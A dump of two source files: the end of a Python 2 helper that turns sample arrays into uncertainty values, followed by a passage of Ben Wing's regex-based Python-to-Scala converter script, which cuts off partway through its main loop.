xint=st.t.interval(conf/100.0,dta.size-1,loc=xm,scale=xstd/np.sqrt(dta.size))
global DEBUG
if DEBUG:
print u'\tmean={:.3f}'.format(xm)
print u'\tstd={:.3f}'.format(xstd)
print u'\tskewness={:.3f}'.format(xskew)
print u'\tstd@95%_min={:.3f}'.format(xm-xint[0])
print u'\tstd@95%_max={:.3f}'.format(xint[1]-xm)
xstd=xm-xint[0]
try:
return un.ufloat(xm,np.sqrt(ierr**2+xstd**2))
except RuntimeWarning:
print 'xm=',xm,'ierr=',ierr,'xstd=',xstd
print 'dta:',dta
def __main():
"""
Testing code....
"""
global DEBUG
DEBUG=True
print 'running tests....'
print 'ucreate test:'
print '\tsample array: [1.,1,2,1.5,1.2,1.7,0.9,0.98]'
x=ucreate(np.array([1.,1,2,1.5,1.2,1.7,0.9,0.98]))
print u'\tx={:P}'.format(x)
print 'ucreate test:'
print '\tsample list: [1.,1,2,1.5,1.2,1.7,0.9,0.98]'
x=ucreate([1.,1,2,1.5,1.2,1.7,0.9,0.98])
print u'\tx={:P}'.format(x)
print 'ucreate test:'
print '\tsample tuple: (1.,1,2,1.5,1.2,1.7,0.9,0.98)'
x=ucreate((1.,1,2,1.5,1.2,1.7,0.9,0.98))
print u'\tx={:P}'.format(x)
print 'ucreate test:'
print '\t data o singura valoare,ierr=0.2'
x=ucreate(2,ierr=0.2)
print u'\tx={:P}'.format(x)
print 'ucreate test:'
print '\t list [3.,3,3,3,3,3,3,3],ierr=0.2'
x=ucreate([3.,3,3,3,3,3,3,3],ierr=0.2)
print u'\tx={:P}'.format(x)
DEBUG=False
if __name__ == '__main__':
__main()
|
12,471 | 48d3304efdaaea4cf98650b8b87c029d3d62026d | #!/usr/bin/python
# Copyright (C) 2011 Ben Wing <ben@benwing.com>
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# * The name of Ben Wing may not be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import re
import sys
import fileinput
import optparse
###########################################################################
#
# Comments
#
###########################################################################
## General FIXME's for this program:
## -- BUGBUG: In multiline def() with --remove-self, we change 'self' to
## 'this' but then don't remove 'this'. Works OK with single-line def().
## -- Converting this program to use a proper parser would make some
## conversions easier (e.g. $1 in $2 -> $2 contains $1), and might simplify
## some of the multiline handling.
## -- In variable snarfing/fixing-up (e.g. adding var/val), should:
## 1. Handle cases like (foo, bar) = ..., adding val and noting both
## variables so we handle later cases where either var is modified
## 2. Handle cases like foo, bar = ..., similarly, but MUST add parens
## around the variables, i.e. convert to 'val (foo, bar) = ...'
## 3. Handle cases like val/var (foo, bar) = ..., handling similarly,
## but with the same changes we make whenever we've already seen
## val/var.
## 4. Handle cases like val/var foo, bar = ..., which are equivalent
## to assigning both foo and bar the entire RHS.
## 5. (Different subject) Variable declarations introduced inside of
## braces will scope only to those braces. If we see a val/var,
## add it but also note the current indent, so that when popping past
## that indent level we remove those items. If we see an assignment
## to new variable and have to add our own val/var, we need to keep
## in mind that just adding val/var to the same line will cause the
## var to have the scope of the enclosing brace. So we need to
## track both assignments and references to variables, and if we see
## either, issue a warning indicating that the code will have to be
## fixed up manually. (Moving it out automatically is too tricky for
## what we're doing here.)
## -- Handle XML literals properly in Scala code.
###########################################################################
#
# Command-line options and usage
#
###########################################################################
usage = """%prog [OPTIONS] [FILE]
Convert a Python file to Scala.
Conversion is not perfect, and it is completely expected that further
manual editing is required. The idea is to take care of the most common
conversions necessary, especially the ones (like adding braces) that are
difficult to do with a simple search/replace.
An important property of this program is that it is (largely) idempotent,
i.e. if you run it on code that has previously been converted, it should
do nothing, and if run on partially converted code it should only convert
the remainder. This is useful for various reasons. One of them has to
do with conversions like removing `self.' or changing bracketed array
references to parens that remove useful info. Eventually we want to make
these changes, but before then we may find the unchanged code useful for
e.g. redoing class constructors (which are done in a completely different
fashion in Python and Scala, and basically need to be converted manually)
and adding type annotations to functions (again something to do manually).
Thus, the program is intended to work as follows:
1. Run it to do a preliminary conversion
2. Fix up class constructors, add type annotations
3. Run it again with the -2 (or --second-pass) option to fix up self
references and brackets, and not do other changes that might mess up
previously Scala-fied code (e.g. changing None to null, since None also
has a meaning in Scala).
Currently, parsing is done with regexps rather than context-free. This means
that some constructions may not be converted perfectly. However, strings
of various sorts (including multiline strings) are usually handled properly;
likewise multiline block openers and such. However, embedded XML is NOT
currently handled properly -- or at least, unquoted raw text will get frobbed
instead of ignored. You might want to use the PY2SCALA directives to get
around this (see below).
If the conversion process messes up and changes something that you don't
want changed, you can override this using a directive something like this:
// !!PY2SCALA: <directive>
or like this:
# !!PY2SCALA: <directive>
where <directive> is currently either BEGIN_PASSTHRU (start passing lines
through without trying to frob them) or END_PASSTHRU (end doing this). Note
that the comment sign at the begin is not part of the directive, but simply
a way of embedding the directive in code. Likewise the <> signs do not
appear in the directive command, which uses only uppercase letters, the
underscore character, and possibly numbers. Such a directive will be
recognized anywhere on a line, regardless of what comes before or after --
that way, it can be embedded in a comment or whatever. However, it will only
be recognized if it has exactly the opening tag "!!PY2SCALA: " followed by a
directive command, and only if the command is one of the recognized ones.
That way it's highly unlikely such a directive would appear by accident.
"""
parser = optparse.OptionParser(usage=usage)
parser.add_option("-s", "--scala", action="store_true",
help="""If true, code is already Scala-fied, so don't do
conversions that might negatively affect Scala code.""")
parser.add_option("-r", "--remove-self", "--rs", action="store_true",
help="""Remove self.* references and self params.
Also removes cls.* references and cls params. Not done by default because
it removes info necessary for manually converting classes (especially
constructors) and separating class methods into companion objects. Useful
to rerun this program with this option after these things have been done.""")
parser.add_option("-b", "--convert-brackets", "--cb", action="store_true",
help="""Try to convert array refs like foo[i] to Scala-style foo(i).
Not done by default because it removes info useful for adding type annotations
to functions. Useful to rerun this program with this option after doing
this. You will still have to convert slices by hand. This attempts not
to convert bracket references that are meaningful to Scala (i.e. generic
type parameters) using the assumption that types in Scala begin with an
uppercase letter.""")
parser.add_option("-2", "--second-pass", action="store_true",
help="""Equivalent to -srb. Used when doing a second pass through already Scala-fied code to remove self.* references and convert brackets to parens for array refs.""")
(options, args) = parser.parse_args()
if options.second_pass:
options.scala = True
options.remove_self = True
options.convert_brackets = True
## Process file(s)
def uniprint(text, outfile=sys.stdout, nonl=False, flush=False):
'''Print text string using 'print', converting Unicode as necessary.
If string is Unicode, automatically convert to UTF-8, so it can be output
without errors. Send output to the file given in OUTFILE (default is
stdout). Uses the 'print' command, and normally outputs a newline; but
this can be suppressed using NONL. Output is not normally flushed (unless
the stream does this automatically); but this can be forced using FLUSH.'''
if type(text) is unicode:
text = text.encode("utf-8")
if nonl:
print >>outfile, text,
else:
print >>outfile, text
if flush:
outfile.flush()
def errprint(text, nonl=False):
'''Print text to stderr using 'print', converting Unicode as necessary.
If string is Unicode, automatically convert to UTF-8, so it can be output
without errors. Uses the 'print' command, and normally outputs a newline; but
this can be suppressed using NONL.'''
uniprint(text, outfile=sys.stderr, nonl=nonl)
# A hackish function for print-debugging.
def debprint(fmt, *vals):
errprint("Debug: Line %d, %s" % (lineno, fmt % vals))
# RE's for balanced expressions. This is a major hack. We only use this
# for things like converting '$1 in $2' to '$2 contains $1'. In general,
# we count parens and brackets properly.
balparenexpr = r'\([^()]*\)'
balbracketexpr = r'\[[^\[\]]*\]'
balstr0 = r'(?:[^()\[\]]|%s|%s)*' % (balparenexpr, balbracketexpr)
bal2parenexpr = r'\(%s\)' % balstr0
bal2bracketexpr = r'\[%s\]' % balstr0
bal2str0 = r'(?:[^()\[\]]|%s|%s)*' % (bal2parenexpr, bal2bracketexpr)
bal2strnospace0 = r'(?:[^ ()\[\]]|%s|%s)*' % (bal2parenexpr, bal2bracketexpr)
bal2str = r'(?:[^()\[\]]|%s|%s)+' % (bal2parenexpr, bal2bracketexpr)
bal2strnospace = r'(?:[^ ()\[\]]|%s|%s)+' % (bal2parenexpr, bal2bracketexpr)
if options.scala:
commentre = r''' | /\* .*? \*/ # C-style Scala comment
| /\* .* # C-style Scala comment unmatched (multi-line)
| //.* # C++-style Scala comment
'''
else:
commentre = r''' | [#].*''' # Python comment
# RE to split off quoted strings and comments.
# FIXME: The handling of backslashes in raw strings is slightly wrong;
# I think we only want to look for a backslashed quote of the right type.
# (Or maybe we look for no backslashes at all?)
# FIXME: We don't handle XML literals at all
stringre = re.compile(r'''( r?'[']' .*? '[']' # 3-single-quoted string
| r?""" .*? """ # 3-double-quoted string
| r?'[']'.* # unmatched 3-single-quote
| r?""".* # unmatched 3-double-quote
| r?' (?:\\.|[^'])* ' # single-quoted string
| r?" (?:\\.|[^"])* " # double-quoted string
| r?'.* # unmatched single-quote
| r?".* # unmatched double-quote
%s
)''' % commentre, re.X)
# Test function for above RE. Not called.
def teststr(x):
split = stringre.split(x)
for y in split:
print y
# List of multi-line delimiters (quotes, comments). Each entry is a tuple
# of (start, end) -- this handles comments like /* ... */ properly.
multi_line_delims = [('"""', '"""'), ("'''", "'''")]
if options.scala:
multi_line_delims += [('/*', '*/')]
single_quote_delims = ['"', "'"]
# If we added a triple-quote delimiter, remove it. (We add such delimiters
# to the beginning of a line if we're in the middle of a multi-line quote,
# so our string-handling works right.)
def line_no_added_delim(line, delim):
if delim:
dlen = len(delim)
assert line[0:dlen] == delim
return line[dlen:]
else:
return line
# Add a "virtual line", possibly spanning multiple lines, to the line list
def add_bigline(bigline):
global lines
if bigline is not None:
lines += bigline.split('\n')
# Main function to frob the inside of a line. Passed a line split by
# stringre.split() into alternating text and delimiters composed of
# quoted strings and/or comments. This is a generator function that
# returns values with `yield'.
def modline(split):
for i in xrange(len(split)):
prev = None
if i > 0:
prev = split[i-1]
vv = split[i]
#debprint("Saw #%d: %s", i, vv)
# Skip blank sections (e.g. at end of line after a comment)
if len(vv) == 0:
yield vv
continue
# If we're handling a string composed from the added delimiter,
# don't try to frob it.
nofrob = old_openquote and i == 1 and prev == ""
if i % 2 == 1: # We are looking at a delimiter
# Look for raw-string prefix on strings
vv2 = vv
# raw will be None if no quote of any sort here, 'r' if a raw Python
# string, '' if non-raw string
raw = None
if vv[0] == 'r' and len(vv) > 1 and vv[1] in single_quote_delims:
vv2 = vv[1:]
raw = "r"
elif vv[0] in single_quote_delims:
raw = ""
# Look for (unclosed) multi-line quote or comment
saw_multiline_delim = False
unclosed = False
global openquote
for delim in multi_line_delims:
(delimstart, delimend) = delim
if vv2.startswith(delimstart):
#debprint("Saw multi-line delim %s", delimstart)
saw_multiline_delim = True
if vv2 == delimstart or not vv2.endswith(delimend):
openquote = delimstart
unclosed = True
if saw_multiline_delim and not unclosed:
openquote = None
if raw is not None: # We're handline some sort of string, frob it
if saw_multiline_delim:
# FIXME!! Python has eight types of strings: Single and triple
# quoted strings, using both single and double quotes (i.e.
# ', ", ''', """), as well as the "raw" variants prefixed with r.
# Scala has only two types: Strings quoted like "foo", and
# raw multiline strings quoted like """foo""". We're not properly
# shoehorning the various types of Python strings into Scala
# strings. The only thing we do is try to convert Python strings
# like r"foo" and r'foo' into Scala raw """foo""" strings.
#
# Note that Scala also has single-character literals like 'f',
# whereas Python uses normal strings for this. We try to do the
# right thing here (i.e. leave 'f' as 'f' but convert 'ff' to "ff"),
# but we can't be perfect because (a) we don't know whether a
# single-character Python string should become a Scala string or
# character literal, and (b) since we can be run more than once,
# we can't distinguish "f" as a Scala single-character string
# (should be left alone) from "f" as a Python single-character
# string (potentially convertible to Scala 'f').
if vv2.startswith("'''") and not nofrob:
if unclosed:
yield raw + '"""' + vv2[3:]
else:
yield raw + '"""' + vv2[3:-3] + '"""'
else:
yield vv
continue
for delim in single_quote_delims:
if (vv2.startswith(delim) and
(vv2 == delim or not vv2.endswith(delim))):
warning("Saw unfinished single quoted string %s" % vv)
yield vv
continue
revisedstr = vv2
if vv2.startswith("'") and (
(len(vv2) != 4 if not raw and vv2[1] == '\\' else len(vv2) != 3)
):
# Single-quoted string of length != 1
# Convert to double-quoted string
revisedstr = '"' + vv2[1:-1] + '"'
# FIXME! This may fail with unbackslashed quotes of the other
# sort in the string. See comments above about the eight types of
# Python strings.
if raw:
yield '""' + revisedstr + '""'
else:
yield revisedstr
continue
# We don't convert in the opposite direction because in Scala
# someone might reasonably have a double-quoted string of length 1
# Convert comments
if vv.startswith('#'):
yield '//' + vv[1:]
continue
yield vv
else:
# Not a delimiter
vv = re.sub(r'\bor\b', '||', vv)
vv = re.sub(r'\band\b', '&&', vv)
vv = re.sub(r'\bTrue\b', 'true', vv)
vv = re.sub(r'\bFalse\b', 'false', vv)
# some None in Scala code should actually be None (e.g. when
# Option[T] is used)
if not options.scala:
vv = re.sub(r'\bNone\b', 'null', vv)
vv = re.sub(r'\bnot ', '!', vv)
vv = re.sub(r'\bis (None|null)\b', '== null', vv)
vv = re.sub(r'\bis !.*(None|null)\b', '!= null', vv)
vv = re.sub(r'lambda ([A-Za-z0-9]+): ?', r'\1 => ', vv)
# Seems this isn't necessary; (for x <- y if foo) works fine in Scala
#vv = re.sub(r'[\[(](.*) for (.*) in (.*) if (.*)[)\]]',
# r'(for (\2 <- \3; if \4) yield \1)', vv)
vv = re.sub(r'[\[(](%s) for (.*) in (%s)[)\]]' % (bal2str, bal2str),
r'(for (\2 <- \3) yield \1)', vv)
if not re.match(r'.*\bfor\b', vv):
vv = re.sub(r'(%s) in (%s)\b' % (bal2strnospace, bal2strnospace),
r'\2 contains \1', vv)
vv = re.sub(r'len\((%s)\)' % bal2str, r'\1.length', vv)
vv = re.sub(r'\bpass\b', '()', vv)
# change % to format but only when applied to string
if prev and prev[0] in single_quote_delims:
vv = re.sub(r'^( +)%( +)', r'\1format\2', vv)
if options.remove_self:
vv = re.sub(r'\bself\.', '', vv)
vv = re.sub(r'\bself\b', 'this', vv)
vv = re.sub(r'\bcls\.', '', vv)
# Not sure about this
#vv = re.sub(r'\bcls\b', 'this', vv)
if options.convert_brackets:
# Convert bracketed expressions, but avoid list constructors
# (previous character not alphanumeric) and scala generic vars/types
# (the type in brackets is usually uppercase)
vv = re.sub(r'([A-Za-z0-9_])\[([^A-Z\]]%s)\]' % bal2str0,
r'\1(\2)', vv)
yield vv
# Indentation of current or latest line
curindent = 0
# If not None, a continuation line (line ending in backslash)
contline = None
# Status of any unclosed multi-line quotes (''' or """) or multi-line comments
# at end of line
openquote = None
# Same, but for the beginning of the line
old_openquote = None
# Mismatch in parens/brackets so far at end of line (includes mismatch from
# previous lines, so that a value of 0 means we are at the end of a logical
# line)
paren_mismatch = 0
# Same, but for the beginning of the line
old_paren_mismatch = 0
# Indent last time paren mismatch was zero
zero_mismatch_indent = 0
# Source line number last time paren mismatch was zero
zero_mismatch_lineno = 0
# Blank/comment count last time paren mistmatch was zero
zero_mismatch_prev_blank_or_comment_line_count = 0
# Accumulation of line across paren mismatches and multi-line quotes.
# This will hold the concatenation of all such lines, so that we can
# properly handle multi-line if/def/etc. statements and variable assignments.
bigline = None
# Accumulation of unfrobbed line across paren mismatches
old_bigline = None
# Lineno and indent at start of bigline
bigline_indent = 0
bigline_lineno = 0
# Current source line number. Not the same as a "line index", which is an
# index into the lines[] array. (Not even simply off by 1, because we
# add extra lines consisting of braces, and do other such changes.)
lineno = 0
# Lines accumulated so far. We need to be able to go back and modify old
# lines sometimes. Note that len(lines) is the "line index" of the
# current line being processed, at least after we handle dedentation
# (where we might be inserting lines).
lines = []
# Number of blank or comment-only lines just seen
blank_or_comment_line_count = 0
# Same, not considering current line
prev_blank_or_comment_line_count = 0
# Whether we are ignoring lines due to PY2SCALA directive
in_ignore_lines = False
# Store information associated with an indentation block (e.g. an
# if/def statement); stored into indents[]
class Indent:
# startind: Line index of beginning of block-begin statement
# endind: Line index of end of block-begin statement
# indent: Indentation of block-begin statement
# ty: "python" or "scala"
def __init__(self, startind, endind, indent, ty):
self.startind = startind
self.endind = endind
self.indent = indent
self.ty = ty
# Adjust line indices starting at AT up by BY.
def adjust_lineinds(self, at, by):
if self.startind >= at: self.startind += by
if self.endind >= at: self.endind += by
# Store information associated with a class or function definition;
# stored into defs[]
class Define:
# ty: "class" or "def"
# name: name of class or def
# vardict: dict of currently active params and local vars. The key is
# a variable name and the value is one of "val" (unsettable function
# parameter), "var" (settable function parameter), "explicit"
# (variable declared with an explicit var/val) or a line number
# (bare variable assignment; the line number is so that we can change
# an added 'val' to 'var' if necessary).
def __init__(self, ty, name, vardict):
self.ty = ty
self.name = name
self.vardict = vardict
self.lineno = bigline_lineno
self.indent = bigline_indent
self.lineind = len(lines)
# Line index of insertion point in companion object
self.compobj_lineind = None
# Adjust line indices starting at AT up by BY.
def adjust_lineinds(self, at, by):
#debprint("Adjusting lines at %s by %s", at, by)
if self.lineind >= at: self.lineind += by
if self.compobj_lineind and self.compobj_lineind >= at: self.compobj_lineind += by
for (k, v) in self.vardict.iteritems():
if type(v) is int and v >= at: self.vardict[k] += by
#debprint("Finishing adjusting lines at %s by %s, len(lines)=%s", at, by,
# len(lines))
#for (k, v) in self.vardict.iteritems():
# debprint("name=%s, vardict[%s] = %s", self.name, k, v)
# List of currently active indentation blocks, of Indent objects
indents = []
# List, for each currently active function and class define, of Define objects
defs = []
# Adjust line indices starting at AT up by BY. Used when inserting or
# deleting lines from lines[].
def adjust_lineinds(at, by):
for d in defs:
d.adjust_lineinds(at, by)
for i in indents:
i.adjust_lineinds(at, by)
# Output a warning for the user.
def warning(text, nonl=False):
'''Line errprint() but also add "Warning: " and line# to the beginning.'''
errprint("Warning: %d: %s" % (lineno, text), nonl=nonl)
################# Main loop
# Loop over all lines in stdin or argument(s)
for line in fileinput.input(args):
lineno += 1
# Remove LF or CRLF, convert tabs to spaces
line = line.rstrip("\r\n").expandtabs()
#debprint("Saw line: %s", line)
# If previous line was continued, add it to this line
if contline:
# This is OK because we checked to make sure continuation was not in
# a quote or comment
line = contline.rstrip() + " " + line.lstrip()
contline = None
m = re.match('.*!!PY2SCALA: ([A-Z_]+)', line)
if m:
directive = m.group(1)
if directive == 'BEGIN_PASSTHRU':
in_ignore_lines = True
lines += [line]
continue
elif directive == 'END_PASSTHRU':
in_ignore_lines = False
lines += [line]
continue
if in_ignore_lines:
lines += [line]
continue
# If we are continuing a multiline quote, add the delimiter to the
# beginning. That way we will parse the line correctly. We remove
# the delimiter at the bottom.
if openquote:
line = openquote + line
# Split the line based on quoted and commented sections
#debprint("Line before splitting: [%s]", line)
splitline = list(stringre.split(line))
# If line is continued, don't do anything yet (till we get the whole line)
lasttext = splitline[-1]
if lasttext and lasttext[-1] == '\\':
contline = line_no_added_delim(line, openquote)[0:-1]
continue
# Look for blank or comment-only lines
blankline = re.match(r'^ *$', line)
if re.match('^ *(#.*|//.*)?$', line):
blank_or_comment_line_count += 1
else:
prev_blank_or_comment_line_count = blank_or_comment_line_count
blank_or_comment_line_count = 0
# Record original line, and values of paren_mismatch and openquote
# at start of line
old_paren_mismatch = paren_mismatch
oldline = line
old_openquote = openquote
# Count # of mismatched parens (also brackets)
for i in xrange(len(splitline)):
vv = splitline[i]
if i % 2 == 0: # Make sure not a quoted string or comment
# Count mismatch of parens and brackets. We don't do braces because
# we might be processing Scala-like code.
paren_mismatch += vv.count('(') + vv.count('[') - \
vv.count(')') - vv.count(']')
#debprint("Line %d, old paren mismatch %d, new paren mismatch %d",
# lineno, old_paren_mismatch, paren_mismatch)
if paren_mismatch < 0:
warning("Apparent unmatched right-paren, we might be confused: %s" % line)
paren_mismatch = 0
# Compute current indentation, handle dedenting (may need to insert braces).
# Note that blank lines don't have any effect on indentation in Python,
# and nor do continued multi-line quotes.
if not old_openquote and not blankline:
# Get current indentation
m = re.match('( *)', line)
indent = len(m.group(1))
# Handle dedent: End any blocks as appropriate, and add braces
if indent < curindent:
# Pop off all indentation blocks at or more indented than current
# position, and add right braces
while indents and indents[-1].indent >= indent:
indobj = indents.pop()
# Can happen, e.g., if // is used in Python to mean "integer division",
# or other circumstances where we got confused
if old_paren_mismatch > 0:
warning("Apparent unmatched left-paren somewhere before, possibly line %d, we might be confused" % zero_mismatch_lineno)
# Reset to only mismatched left parens on this line
paren_mismatch = paren_mismatch - old_paren_mismatch
if paren_mismatch < 0:
paren_mismatch = 0
if indobj.ty == "scala":
continue
rbrace = "%s}" % (' '*indobj.indent)
# Check for right brace already present; if so, just make sure
# corresponding left brace is present
if line.startswith(rbrace):
lines[indobj.endind] += " {"
else:
insertpos = len(lines)
# Insert the right brace *before* any blank lines (we skipped over
# them since they don't affect indentation)
while re.match('^ *$', lines[insertpos - 1]):
insertpos -= 1
# If the "block" is only a single line, and it's not introduced
# by "def" or "class", don't add braces.
# We check for 2 because with a single-line block, the potential
# right-brace insertion point is 2 lines past the opening block
# (1 for opening line itself, 1 for block)
#debprint("lineno:%s, startind:%s, endind:%s, lines:%s",
# lineno, indobj.startind,
# indobj.endind, len(lines))
if (insertpos - indobj.endind > 2 or
re.match('^ *(def|class) ', lines[indobj.startind])):
lines[indobj.endind] += " {"
lines[insertpos:insertpos] = [rbrace]
# Pop off all function definitions that have been closed
while defs and defs[-1].indent >= indent:
defs.pop()
# Set indentation value for current line
curindent = indent
# Record some values if no paren mismatch or continued quote at start of line
if not old_openquote and old_paren_mismatch == 0:
zero_mismatch_indent = curindent
zero_mismatch_lineno = lineno
zero_mismatch_prev_blank_or_comment_line_count = prev_blank_or_comment_line_count
########## Now we modify the line itself
# Frob the line in various ways (e.g. change 'and' to '&&')
line = ''.join(modline(splitline))
# Accumulate a logical line into 'bigline' across unmatched parens and quotes
line_without_delim = line_no_added_delim(line, old_openquote)
old_line_without_delim = line_no_added_delim(oldline, old_openquote)
if old_paren_mismatch == 0 and not old_openquote:
assert bigline == None
bigline = line_without_delim
old_bigline = old_line_without_delim
bigline_indent = curindent
bigline_lineno = lineno
assert bigline_indent == zero_mismatch_indent
assert bigline_lineno == zero_mismatch_lineno
else:
bigline = bigline + "\n" + line_without_delim
old_bigline = old_bigline + "\n" + old_line_without_delim
# If we see a Scala-style opening block, just note it; important for
# unmatched-paren handling above (in particular where we reset the
# unmatched-paren count at the beginning of a block, to deal with
# errors in parsing)
if paren_mismatch == 0 and not openquote and (
re.match(r'.*\{ *$', splitline[-1])):
indents += [Indent(len(lines), len(lines) + (bigline or "").count('\n'),
zero_mismatch_indent, "scala")]
# Error recovery. If we see a Python block opening, and we're not in
# a continued quote, and we were inside a parened or bracketed expr,
# something is probably wrong, so reset paren count.
if not old_openquote and old_paren_mismatch > 0 and \
re.match(r' *(if|for|with|while|try|elif|else|except|def|class) +.*:.*$',
line):
# Can happen, e.g., if // is used in Python to mean "integer division"
# but we interpret it as a comment (so a closing paren gets ignored),
# or other circumstances where we got confused or the user actually
# messed up their parens
warning("Apparent unmatched left-paren somewhere before, possibly line %d, we might be confused" % zero_mismatch_lineno)
# Reset to only mismatched parens on this line
paren_mismatch = paren_mismatch - old_paren_mismatch
if paren_mismatch < 0:
paren_mismatch = 0
# Restart the logical line, add any old line to lines[]
add_bigline(bigline)
bigline = line
old_bigline = oldline
# Skip to next line if this line doesn't really end
if paren_mismatch > 0 or openquote:
continue
# Remove self and cls parameters from def(), if called for
# Note that we changed 'self' to 'this' above
if options.remove_self:
m = re.match(r'^(\s*def\s+[A-Za-z0-9_]+\s*)\((?:\s*(?:this|cls)\s*)(\)|, *)(.*)$', bigline)
if m:
if m.group(2) == ')':
bigline = '%s()%s' % (m.group(1), m.group(3))
else:
bigline = '%s(%s' % (m.group(1), m.group(3))
if re.match(r'^ *def +__init__\(', bigline):
warning("Need to convert to Scala constructor: %s" % bigline)
######### Handle blocks.
front, body, back = "", "", ""
frontbody = bigline
# Look for a Python statement introducing a block. Split off leading
# indentation and trailing spaces.
m = re.match(r'(\s*)(.*?)\s*:\s*$', frontbody, re.S)
if m:
front, body = m.groups()
else:
splits = re.split(r'(#|//)', line, 1)
if len(splits) == 3:
frontbody = splits[0]
newback = splits[1] + splits[2]
m = re.match(r'''(\s*)([^\'\"]*?)\s*:\s*$''', frontbody, re.S)
if m:
front, body = m.groups()
back = " " + newback
# FIXME: Don't yet handle single-line if statements, e.g. 'if foo: bar'
# Check for def/class and note function arguments. We do this separately
# from the def check below so we find both def and class, and both
# Scala and Python style.
m = re.match('\s*(def|class)\s+(.*?)(?:\((.*)\))?\s*(:\s*$|=?\s*\{ *$|extends\s.*|with\s.*|\s*$)', bigline, re.S)
if m:
(ty, name, allargs, coda) = m.groups()
argdict = {}
# In Python class foo(bar): declarations, bar is a superclass, not
# parameters. If Scala the equivalent decls are parameters, just like
# functions in both languages.
python_style_class = ty == 'class' and coda and coda[0] == ':'
if not python_style_class and allargs and allargs.strip():
args = allargs.strip().split(',')
# Strip off default assignments
args = [x.strip().split('=')[0].strip() for x in args]
# Strip off Scala types
args = [x.strip().split(':')[0].strip() for x in args]
for arg in args:
if arg.startswith("var "):
argdict[arg[4:].strip()] = "var"
elif arg.startswith("val "):
argdict[arg[4:].strip()] = "val"
else:
argdict[arg] = "val"
defs += [Define(ty, name, argdict)]
#debprint("Adding args %s for function", argdict)
# Check for various types of blocks, and substitute.
# We only want to check once per line, and Python
# unfortunately makes it rather awkward to do convenient if-then checks
# with regexps because there's no equivalent of
#
# if ((m = re.match(...))):
# do something with m.groups()
# elif ((m = re.match(...))):
# etc.
#
# Instead you need assignment and check on separate lines, and so all
# ways of chaining multiple regex matches will be awkward. We choose
# to create an infinite loop and break after each match, or at the end.
# This almost directly mirrors the architecture of a C switch() statement.
#
newblock = None
while True:
if body:
# Check for def
m = re.match('def\s+(.*?)\((.*)\)$', body, re.S)
if m:
newblock = "def %s(%s)" % m.groups()
break
# Check for 'for' statement
m = re.match('for\s+(.*?)\s+in\s+(.*)$', body, re.S)
if m:
newblock = "for (%s <- %s)" % m.groups()
break
# Check for 'if' statement
m = re.match('if\s+(.*)$', body, re.S)
if m:
newblock = "if (%s)" % m.groups()
break
# Check for 'elif' statement
m = re.match('elif\s+(.*)$', body, re.S)
if m:
newblock = "else if (%s)" % m.groups()
break
# Check for 'else' statement
m = re.match('else\s*$', body, re.S)
if m:
newblock = "else"
break
# Check for 'while' statement
m = re.match('while\s(.*)$', body, re.S)
if m:
newblock = "while (%s)" % m.groups()
break
# Check for 'try' statement
m = re.match('try\s*$', body, re.S)
if m:
newblock = "try"
break
# Check for bare 'except' statement
m = re.match('except\s*$', body, re.S)
if m:
newblock = "catch"
break
# Check for 'except' statement
# FIXME: Should convert to a case statement within the body
m = re.match('except\s+(.*)$', body, re.S)
if m:
newblock = "catch %s" % m.groups()
break
# Check for 'finally' statement
m = re.match('finally\s*$', body, re.S)
if m:
newblock = "finally"
break
# Check for 'class(object)' statement
# Class that inherits from `object' (new-style class), convert to
# class without superclass
m = re.match('class\s+(.*)\(object\)', body, re.S)
if m:
newblock = "class %s" % m.groups()
break
# Check for 'class(superclass)' statement
m = re.match('class\s+(.*)\((.*)\)$', body, re.S)
if m:
newblock = "class %s extends %s" % m.groups()
break
# Check for 'class' statement (no superclass)
m = re.match('class\s+([^(]*)$', body, re.S)
if m:
newblock = "class %s" % m.groups()
break
# Check for assignments and modifying assignments (e.g. +=) to variables
# inside of functions. Add val/var to bare assignments to variables not
# yet seen. Initially we add 'val', but if we later see the variable
# being reassigned or modified, we change it to 'var'. Also look for
# self.* variables, but handle them differently. For one,
# they logically belong to the class, not the function they're in,
# so we need to find the right dictionary to store them in. Also,
# we don't add 'val' or 'var' to them unless we see them in __init__(),
# and in that case we move them outside the __init__() so they end up
# in class scope. Existing variables at class scope get moved to
# companion objects. (Note the following: Variables declared at class
# scope are instance variables in Scala, but class variables in Python.
# Instance variables in Python are set using assignments to self.*;
# class variables in Scala are stored in a companion object.)
#debprint("About to check for vars, line %d, fun %s",
# lineno, defs and defs[-1].name)
if defs and paren_mismatch == 0:
# Retrieve most recent def/class definition
dd = defs[-1]
#debprint("Checking for vars, line %d, old_bigline[%s], bigline[%s]", lineno, old_bigline, bigline)
# We might have removed a 'self.' from a variable assignment, if
# --remove-self was given. But we want to know whether the assignment
# was a self.* variable. So we first look for an assignment in the
# unfrobbed line, and if so, retrieve the variable name, and then
# look at the frobbed line to get everything else (in particular,
# the RHS, which might have been frobbed).
assignre = re.compile('(\s*)(val\s+|var\s+|)((?:self\.|cls\.)?[a-zA-Z_][a-zA-Z_0-9]*)(\s*[+\-*/]?=)(.*)', re.S)
m = assignre.match(old_bigline)
if m:
(_, _, varvar, _, _) = m.groups()
m = assignre.match(bigline)
if m:
(newindent, newvaldecl, _, neweq, newrhs) = m.groups()
#debprint("lineno: %d, Saw var: %s", lineno, varvar)
